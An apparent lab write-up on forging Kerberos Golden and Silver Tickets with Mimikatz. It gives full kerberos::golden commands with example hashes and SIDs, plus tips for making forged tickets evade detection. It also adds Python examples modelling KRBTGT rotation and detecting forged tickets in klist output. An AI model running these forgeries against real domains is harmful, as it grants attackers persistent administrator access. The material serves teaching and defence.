
Golden Ticket

The example below shows how to create a Kerberos Ticket-Granting Ticket (TGT) for a user account that does not actually exist in the directory. This works because the TGT is encrypted with the KRBTGT key: a Domain Controller that can decrypt it trusts its contents as-is and, before the patch below, does not check that the named account exists.

With the November 2021 Security Updates for Kerberos this attack method was patched. If the Domain Controllers have this update, a ticket for a non-existent account is rejected and a valid (existing) user must be used instead.


To generate the Golden Ticket we need the NTLM hash of the KRBTGT account (Mimikatz uses it as the RC4 key for the ticket) and the Domain SID.

# We can use this Command (ActiveDirectory module) to find the Domain SID.
# Selecting the property prints only the SID string that Mimikatz expects.
(Get-ADDomain).DomainSID.Value

Once we have the Domain SID we can load Mimikatz and generate the Golden Ticket.

:: [admin]    - Username we want to impersonate (against unpatched DCs it does not need to exist).
:: [domain]   - FQDN of the domain we want to generate the ticket for.
:: [id]       - User RID. By default Mimikatz uses RID 500, the RID of the built-in Administrator account.
:: [sid]      - SID of the domain we want to generate the ticket for (the domain SID, without a trailing RID).
:: [krbtgt]   - NTLM hash of the KRBTGT account.
:: [endin]    - Ticket lifetime in minutes. By default Mimikatz generates a ticket valid for 10 years; the default AD Kerberos policy is 10 hours (600 minutes), and a 10-year ticket is an obvious indicator, so match the policy.
:: [renewmax] - Maximum ticket lifetime with renewal, in minutes. By default Mimikatz uses 10 years here too; the default AD Kerberos policy is 7 days (10080 minutes), so match the policy.
:: [ptt]      - Pass-the-ticket: inject the ticket directly into the current session, so it is ready to be used.
kerberos::golden /admin:<Username> /domain:za.adobe.loc /id:500 /sid:<Domain SID> /krbtgt:<NTLM Hash of KRBTGT Account> /endin:600 /renewmax:10080 /ptt

:: Query Example
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.adobe.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /krbtgt:16f9af38fca3ada405386b3b57366082 /endin:600 /renewmax:10080 /ptt

We can verify that the Golden Ticket is working by listing the C$ share of the Domain Controller with dir (this forces a service-ticket request using the injected TGT) and then checking the cached tickets with klist.

:: List Domain Controller Contents
dir \\PCDC.za.adobe.loc\c$\

:: Displays a list of currently Cached Kerberos Tickets
klist

Silver Ticket

Even if a Golden Ticket has an extremely long lifetime, the Blue Team can still invalidate it by rotating the KRBTGT password twice: the Domain Controllers keep the previous KRBTGT key as well as the current one, so a single rotation leaves the forged ticket usable. A Silver Ticket is a forged service ticket (TGS) encrypted with the key of the target machine account instead of the KRBTGT key. It is less likely to be discovered, because the Domain Controller is never contacted when the ticket is used, and it is significantly harder to defend against, since the password of every machine account that may have been compromised must be rotated.
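To show why one KRBTGT rotation is not enough, here is an added example (not code from the original page, and not Mimikatz or Windows code) that models the Domain Controller's key history: the KDC accepts a TGT protected under either the current or the previous KRBTGT key. The model uses an HMAC over the ticket fields in place of the real Kerberos encryption of ticket and PAC, and the stolen-key value, account name and domain SID are taken from the page's example; the `KdcKeyHistory`, `forge_tgt` and `verify_tgt` names are the example's own.

```python
"""Model of KRBTGT key history: why a Golden Ticket survives one rotation.

Simplification (labelled as such): a real TGT is encrypted with the KRBTGT
key and carries a signed PAC; here the ticket is an HMAC-protected blob.
The key-history rule is the same: the KDC accepts a ticket protected under
the current key OR the previous one, so legitimate tickets keep working
through a rotation. A ticket forged with a stolen key therefore dies only
after the second rotation.
"""
import hashlib
import hmac
import json
import os


def forge_tgt(krbtgt_key: bytes, user: str, rid: int, domain_sid: str) -> dict:
    """Build a ticket body for `user` and protect it with `krbtgt_key`.

    Mirrors the Mimikatz parameters /admin, /id, /sid and /krbtgt.
    """
    body = json.dumps({"user": user, "rid": rid, "sid": domain_sid},
                      sort_keys=True).encode()
    mac = hmac.new(krbtgt_key, body, hashlib.sha256).hexdigest()
    return {"body": body, "mac": mac}


def verify_tgt(krbtgt_key: bytes, ticket: dict) -> bool:
    """Return True if the ticket was protected under `krbtgt_key`."""
    expected = hmac.new(krbtgt_key, ticket["body"], hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, ticket["mac"])


class KdcKeyHistory:
    """The KDC side: current key plus the previous one (N-1)."""

    def __init__(self, initial_key: bytes):
        self.current = initial_key
        self.previous = None

    def rotate(self, new_key: bytes = None) -> None:
        """Password reset on krbtgt: old current key becomes the previous key."""
        self.previous = self.current
        self.current = new_key if new_key is not None else os.urandom(16)

    def accepts(self, ticket: dict) -> bool:
        """A TGT is honoured if it verifies under the current or previous key."""
        for key in (self.current, self.previous):
            if key is not None and verify_tgt(key, ticket):
                return True
        return False


def rotation_demo() -> list:
    """Forge a ticket with a stolen key, then rotate twice.

    Returns whether the ticket is accepted [before, after 1st, after 2nd].
    """
    # Stolen KRBTGT key: the hash value used in the page's example.
    stolen_key = bytes.fromhex("16f9af38fca3ada405386b3b57366082")
    kdc = KdcKeyHistory(stolen_key)
    golden = forge_tgt(stolen_key, "ReallyNotALegitAccount", 500,
                       "S-1-5-21-3885271727-2693558621-2658995185")

    results = [kdc.accepts(golden)]   # True: key is current
    kdc.rotate()
    results.append(kdc.accepts(golden))  # True: key is still the previous one
    kdc.rotate()
    results.append(kdc.accepts(golden))  # False: key has fallen out of history
    return results


if __name__ == "__main__":
    print("accepted before / after 1st / after 2nd rotation:", rotation_demo())
```

Operationally, the two resets must not be done back-to-back on a real domain: the second reset should wait until the first has replicated to every Domain Controller, otherwise legitimate tickets issued under the old key stop validating everywhere at once.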

We can use Mimikatz to Generate a Silver Ticket.

:: [admin]   - Username we want to impersonate.
:: [domain]  - FQDN of the domain we want to generate the ticket for.
:: [id]      - User RID. By default Mimikatz uses RID 500, the RID of the built-in Administrator account.
:: [sid]     - SID of the domain we want to generate the ticket for.
:: [target]  - FQDN of the target server. It can be any domain-joined host whose machine-account hash we hold.
:: [rc4]     - NTLM hash of the machine account of our target (used as the RC4 key that encrypts the service ticket).
:: [service] - The service (SPN class) the forged TGS is for. CIFS is a safe bet, since it allows file-share access.
:: [ptt]     - Pass-the-ticket: inject the ticket directly into the current session, so it is ready to be used.
kerberos::golden /admin:<Username> /domain:za.adobe.loc /id:500 /sid:<Domain SID> /target:<FQDN of Server being Targeted> /rc4:<NTLM Hash of Machine Account of Target> /service:cifs /ptt

:: Query Example
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.adobe.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /target:PCMC.za.adobe.loc /rc4:4b091b72ce2eefece6494ee0f1bb874a /service:cifs /ptt

We can verify that the Silver Ticket is working by listing the C$ share of the target machine (PCMC.za.adobe.loc in this example) with dir and then checking the cached tickets with klist. Unlike the Golden Ticket case, klist will show only the injected cifs service ticket and no TGT, since no TGT was ever requested.

:: List Target Machine Contents
dir \\PCMC.za.adobe.loc\c$\

:: Displays a list of currently Cached Kerberos Tickets
klist
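The two klist verification steps above (for the Golden Ticket and for the Silver Ticket) leave traces that a defender, or an operator reviewing their own tradecraft, can check for. The following is an added example, not code from the original page: a Python script that parses Windows klist output and flags a TGT whose lifetime or renewal window exceeds the default policy (10 hours / 7 days), a TGT using RC4-HMAC (the Mimikatz default when no AES key is supplied), and a service ticket cached with no TGT for its realm (the Silver Ticket case). The two klist listings are constructed sample data, the US date format is an assumption about the host's locale, and `parse_klist` / `find_indicators` are the example's own names.

```python
"""Flag Golden/Silver Ticket indicators in Windows `klist` output (added example)."""
import re
from datetime import datetime, timedelta

# Default AD Kerberos policy, the same values used for /endin and /renewmax above.
POLICY_MAX_TICKET = timedelta(minutes=600)
POLICY_MAX_RENEW = timedelta(minutes=10080)

# Assumption: klist prints dates in US format on this host (e.g. 1/20/2022 10:00:00).
TIME_FMT = "%m/%d/%Y %H:%M:%S"

# Each cached ticket starts with "#<n>>"; the fields we need follow on indented lines.
TICKET_SPLIT = re.compile(r"^#\d+>", re.MULTILINE)
FIELD = re.compile(
    r"^\s*(Client|Server|KerbTicket Encryption Type|Start Time|End Time|Renew Time):\s*(.*?)\s*$",
    re.MULTILINE,
)

# Constructed sample: a forged TGT with Mimikatz's 10-year defaults plus a service ticket.
SAMPLE_GOLDEN = """\
Current LogonId is 0:0x3e7

Cached Tickets: (2)

#0>     Client: ReallyNotALegitAccount @ ZA.ADOBE.LOC
        Server: krbtgt/ZA.ADOBE.LOC @ ZA.ADOBE.LOC
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 1/20/2022 10:00:00 (local)
        End Time:   1/17/2032 10:00:00 (local)
        Renew Time: 1/17/2032 10:00:00 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY

#1>     Client: ReallyNotALegitAccount @ ZA.ADOBE.LOC
        Server: cifs/PCDC.za.adobe.loc @ ZA.ADOBE.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a40000 -> forwardable renewable pre_authent ok_as_delegate
        Start Time: 1/20/2022 10:01:12 (local)
        End Time:   1/20/2022 20:00:00 (local)
        Renew Time: 1/27/2022 10:00:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
"""

# Constructed sample: an injected cifs service ticket and no TGT at all.
SAMPLE_SILVER = """\
Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>     Client: ReallyNotALegitAccount @ ZA.ADOBE.LOC
        Server: cifs/PCMC.za.adobe.loc @ ZA.ADOBE.LOC
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 1/20/2022 10:00:00 (local)
        End Time:   1/20/2022 20:00:00 (local)
        Renew Time: 1/27/2022 10:00:00 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
"""


def _parse_time(value: str) -> datetime:
    return datetime.strptime(value.replace("(local)", "").strip(), TIME_FMT)


def parse_klist(text: str) -> list:
    """Turn klist output into one dict per cached ticket."""
    tickets = []
    for chunk in TICKET_SPLIT.split(text)[1:]:
        fields = dict(FIELD.findall(chunk))
        client, realm = (p.strip() for p in fields["Client"].split("@"))
        server, _server_realm = (p.strip() for p in fields["Server"].split("@"))
        tickets.append({
            "client": client, "realm": realm, "server": server,
            "etype": fields.get("KerbTicket Encryption Type", ""),
            "start": _parse_time(fields["Start Time"]),
            "end": _parse_time(fields["End Time"]),
            "renew": _parse_time(fields["Renew Time"]),
        })
    return tickets


def find_indicators(tickets: list) -> list:
    """Return human-readable findings for forged-ticket indicators."""
    findings = []
    realms_with_tgt = {t["realm"] for t in tickets if t["server"].lower().startswith("krbtgt/")}
    for t in tickets:
        label = f"{t['client']}@{t['realm']} -> {t['server']}"
        if t["server"].lower().startswith("krbtgt/"):
            if t["end"] - t["start"] > POLICY_MAX_TICKET:
                findings.append(f"{label}: TGT lifetime {t['end'] - t['start']} exceeds policy {POLICY_MAX_TICKET}")
            if t["renew"] - t["start"] > POLICY_MAX_RENEW:
                findings.append(f"{label}: TGT renewable for {t['renew'] - t['start']}, policy is {POLICY_MAX_RENEW}")
            if "RC4" in t["etype"].upper():
                findings.append(f"{label}: TGT encrypted with RC4-HMAC (Mimikatz default; anomalous in an AES domain)")
        elif t["realm"] not in realms_with_tgt:
            findings.append(f"{label}: service ticket cached with no TGT for {t['realm']} (Silver Ticket indicator)")
    return findings


if __name__ == "__main__":
    for name, sample in (("golden", SAMPLE_GOLDEN), ("silver", SAMPLE_SILVER)):
        print(f"[{name}]")
        for finding in find_indicators(parse_klist(sample)):
            print("  ", finding)
```

The checks are deliberately conservative: a ticket generated with /endin:600 /renewmax:10080 passes the lifetime checks, which is exactly why the examples above set those values, leaving the RC4 encryption type and the missing-TGT pattern as the remaining host-side indicators.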